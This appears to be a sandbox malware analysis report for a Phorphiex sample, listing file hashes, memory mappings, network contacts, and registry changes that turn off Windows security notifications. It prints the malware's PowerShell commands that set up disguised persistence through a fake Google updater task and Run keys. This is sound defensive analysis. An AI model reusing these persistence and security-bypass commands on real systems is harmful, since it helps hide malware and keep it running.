| SHA1 | a1035a7cda7175e3860d68c6419961ac019a1853 |
| SHA256 | 8f7fce104fa87321cd25d98bd3b26579eedd314487369d7e18a9009f5fb7b5a6 |
| SHA512 | 81c74e8a27980b0460bc15f6745d5a4d4ff9c310bfd32c6e59e7acfc098ddbf06a399e3e6eebd77c3f9953fbe7cda92df63668d3e374329c5a5379eeea9fc51e |
\Users\Admin\AppData\Local\Temp\1176812100.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/2032-85-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\394619085.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1532-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\394619085.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\394619085.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1532-91-0x000000013FD00000-0x000000013FD06000-memory.dmp
memory/828-93-0x0000000000000000-mapping.dmp
memory/1360-94-0x0000000000000000-mapping.dmp
memory/616-95-0x0000000000000000-mapping.dmp
memory/1108-96-0x0000000000000000-mapping.dmp
C:\Users\Admin\tncmds.dat
| MD5 | e50407aedd7733dd624b0000b557961d |
| SHA1 | e7990c92d876c434a36ef55ae175eade594d0a74 |
| SHA256 | 896ce7dac39bb013ef24d3ad0aa67b7871ee676b0951613f9a0a31686adea34c |
| SHA512 | 307c507312ad447c735624442423552a96a4f9c6b839460b68bf1ef07a14404ca21bc99b5c40597790c9091784e734c7750428a98036a05affbd3b1047469596 |
C:\Users\Admin\tnnodes.dat
| MD5 | 4fa104e9ad7b04d440579ff06af9f698 |
| SHA1 | 5b1b8be4f3092408399a9e11cc2d1ca58b81fcc6 |
| SHA256 | 28e970fce79c5d14035fdf1def7a92cc475e6ec4bf8d950b89d4841ce774bd74 |
| SHA512 | b6c891399c2620d71c94be6ac1f380f875d3ef299d28d53dcad7f8e9ab886caea1908bad7e8ecd632391580a071cd622fbfade8a32249a8c59f75a0de538e3d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZN60M0QQ\2[1]
| MD5 | 65983066e843be01675a7ee2d80e0786 |
| SHA1 | d87ea8b288d8b065ab9550b93fb4a74fea721dad |
| SHA256 | 74769851ee802da9f7fce48c4dfadc1fb55fbdf99affa309b76050cb52c3afac |
| SHA512 | 5d1b1e2d8669f3ed77c458ac82f0ad94197eb4fdb87ee8e62396ef5ed137e25f7484caa3bf694c2c4693b09f7a48c65c4aad15c9be77606c2162c8300c4df511 |
memory/1072-100-0x0000000000000000-mapping.dmp
memory/1072-102-0x000007FEF3800000-0x000007FEF4223000-memory.dmp
memory/1072-104-0x0000000002A24000-0x0000000002A27000-memory.dmp
memory/1072-103-0x000007FEF2CA0000-0x000007FEF37FD000-memory.dmp
memory/1072-105-0x000000001B770000-0x000000001BA6F000-memory.dmp
memory/640-106-0x0000000000000000-mapping.dmp
memory/1072-108-0x0000000002A2B000-0x0000000002A4A000-memory.dmp
memory/1072-107-0x0000000002A24000-0x0000000002A27000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/1228-110-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2d1d7d994e64eeeb2d96f4b256054080 |
| SHA1 | be46ce73a9fb0c4e42971926ee6d3801f51f68a0 |
| SHA256 | 57c931976b782201f1c944b53671b7231798c20b9c40e8269d5eeac318789b7c |
| SHA512 | f0d17f80d2df279b9f7d0d689f0db33b9608bf2d842aac020774302fc3f40a0c47c47334394197fe7df81c04640cc4500db988ecd0e1201d82ec54f86783349f |
memory/1228-113-0x000007FEF2E60000-0x000007FEF3883000-memory.dmp
memory/1228-114-0x000007FEEE5A0000-0x000007FEEF0FD000-memory.dmp
\Users\Admin\AppData\Local\Temp\734023711.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\734023711.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1940-116-0x0000000000000000-mapping.dmp
memory/1228-119-0x0000000002634000-0x0000000002637000-memory.dmp
memory/1648-120-0x0000000000000000-mapping.dmp
memory/1228-121-0x0000000002634000-0x0000000002637000-memory.dmp
memory/1228-122-0x000000000263B000-0x000000000265A000-memory.dmp
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
memory/1516-124-0x0000000000000000-mapping.dmp
memory/2024-126-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
memory/1472-128-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2d1d7d994e64eeeb2d96f4b256054080 |
| SHA1 | be46ce73a9fb0c4e42971926ee6d3801f51f68a0 |
| SHA256 | 57c931976b782201f1c944b53671b7231798c20b9c40e8269d5eeac318789b7c |
| SHA512 | f0d17f80d2df279b9f7d0d689f0db33b9608bf2d842aac020774302fc3f40a0c47c47334394197fe7df81c04640cc4500db988ecd0e1201d82ec54f86783349f |
memory/1472-131-0x000007FEF3800000-0x000007FEF4223000-memory.dmp
memory/1472-132-0x000007FEF2CA0000-0x000007FEF37FD000-memory.dmp
memory/1620-133-0x0000000000000000-mapping.dmp
memory/1472-135-0x00000000025CB000-0x00000000025EA000-memory.dmp
memory/1472-134-0x00000000025C4000-0x00000000025C7000-memory.dmp
memory/268-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2d1d7d994e64eeeb2d96f4b256054080 |
| SHA1 | be46ce73a9fb0c4e42971926ee6d3801f51f68a0 |
| SHA256 | 57c931976b782201f1c944b53671b7231798c20b9c40e8269d5eeac318789b7c |
| SHA512 | f0d17f80d2df279b9f7d0d689f0db33b9608bf2d842aac020774302fc3f40a0c47c47334394197fe7df81c04640cc4500db988ecd0e1201d82ec54f86783349f |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1620-140-0x000007FEF3800000-0x000007FEF4223000-memory.dmp
memory/1620-141-0x000007FEF2CA0000-0x000007FEF37FD000-memory.dmp
memory/1472-142-0x00000000025C4000-0x00000000025C7000-memory.dmp
memory/1472-143-0x00000000025CB000-0x00000000025EA000-memory.dmp
memory/1620-144-0x0000000002404000-0x0000000002407000-memory.dmp
memory/1148-145-0x0000000000000000-mapping.dmp
memory/1620-146-0x0000000002404000-0x0000000002407000-memory.dmp
memory/1620-147-0x000000000240B000-0x000000000242A000-memory.dmp
memory/1388-148-0x0000000000000000-mapping.dmp
memory/1500-149-0x0000000000000000-mapping.dmp
memory/616-150-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
| MD5 | 37dd19b2be4fa7635ad6a2f3238c4af1 |
| SHA1 | e5b2c034636b434faee84e82e3bce3a3d3561943 |
| SHA256 | 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07 |
| SHA512 | 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-28 09:38
Reported
2022-09-28 09:41
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\85692162.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\625122879.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1125717888.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\85692162.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\85692162.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\85692162.exe
C:\Users\Admin\AppData\Local\Temp\85692162.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\625122879.exe
C:\Users\Admin\AppData\Local\Temp\625122879.exe
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 104.80.225.205:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 2.176.39.58:40500 | udp | |
| IR | 151.235.50.104:40500 | tcp | |
| IR | 5.235.166.1:40500 | udp | |
| UZ | 91.188.148.14:40500 | udp | |
| FR | 40.79.150.121:443 | tcp | |
| UA | 78.137.21.80:40500 | udp | |
| UZ | 217.30.161.235:40500 | udp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| RU | 31.8.51.159:40500 | udp | |
| IN | 45.248.160.159:40500 | tcp | |
| UZ | 80.80.213.18:40500 | udp | |
| VE | 190.199.230.103:40500 | udp | |
| SY | 82.137.205.75:40500 | udp | |
| US | 93.184.220.29:80 | tcp | |
| IR | 2.178.82.108:40500 | udp | |
| SY | 82.137.244.124:40500 | udp | |
| SY | 46.53.16.41:40500 | tcp | |
| KZ | 95.56.0.15:40500 | udp | |
| IR | 151.242.43.249:40500 | udp | |
| IR | 5.75.125.149:40500 | udp | |
| IR | 5.75.77.231:40500 | udp | |
| AM | 46.71.107.63:40500 | udp | |
| AO | 102.130.206.220:40500 | tcp | |
| IR | 37.254.50.176:40500 | udp | |
| IR | 77.42.75.249:40500 | udp | |
| IR | 185.124.156.70:40500 | udp | |
| IR | 2.180.76.5:40500 | udp | |
| IR | 5.74.57.165:40500 | udp | |
| IR | 77.42.78.120:40500 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| IR | 84.47.220.42:40500 | udp | |
| RU | 176.194.22.84:40500 | udp | |
| US | 69.67.151.122:40500 | udp |
Files
memory/896-132-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
memory/260-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\85692162.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\85692162.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/260-138-0x00000000007D0000-0x00000000007D6000-memory.dmp
memory/1388-139-0x0000000000000000-mapping.dmp
memory/2544-140-0x0000000000000000-mapping.dmp
memory/3652-141-0x0000000000000000-mapping.dmp
memory/3572-142-0x0000000000000000-mapping.dmp
memory/260-143-0x00007FFECE810000-0x00007FFECF2D1000-memory.dmp
memory/260-144-0x00007FFECE810000-0x00007FFECF2D1000-memory.dmp
memory/4128-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\625122879.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\625122879.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/2724-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/3300-150-0x0000000000000000-mapping.dmp
memory/3300-151-0x000001C715610000-0x000001C715632000-memory.dmp
memory/3300-152-0x00007FFECE930000-0x00007FFECF3F1000-memory.dmp
memory/3300-153-0x00007FFECE930000-0x00007FFECF3F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/1476-155-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 00e7da020005370a518c26d5deb40691 |
| SHA1 | 389b34fdb01997f1de74a5a2be0ff656280c0432 |
| SHA256 | a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe |
| SHA512 | 9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0f3eff52698c0eab8a2c8bd1d9f7c18 |
| SHA1 | 4292ae775443749c6c2281dac800d86b4bdde07e |
| SHA256 | b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6 |
| SHA512 | 642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd |
memory/4356-158-0x0000000000000000-mapping.dmp
memory/1476-159-0x00007FFECE930000-0x00007FFECF3F1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
memory/1476-161-0x00007FFECE930000-0x00007FFECF3F1000-memory.dmp